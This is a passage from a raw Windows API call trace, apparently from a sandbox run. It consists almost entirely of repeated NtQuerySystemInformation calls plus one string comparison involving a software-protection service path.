(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0276.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.085] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.089] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 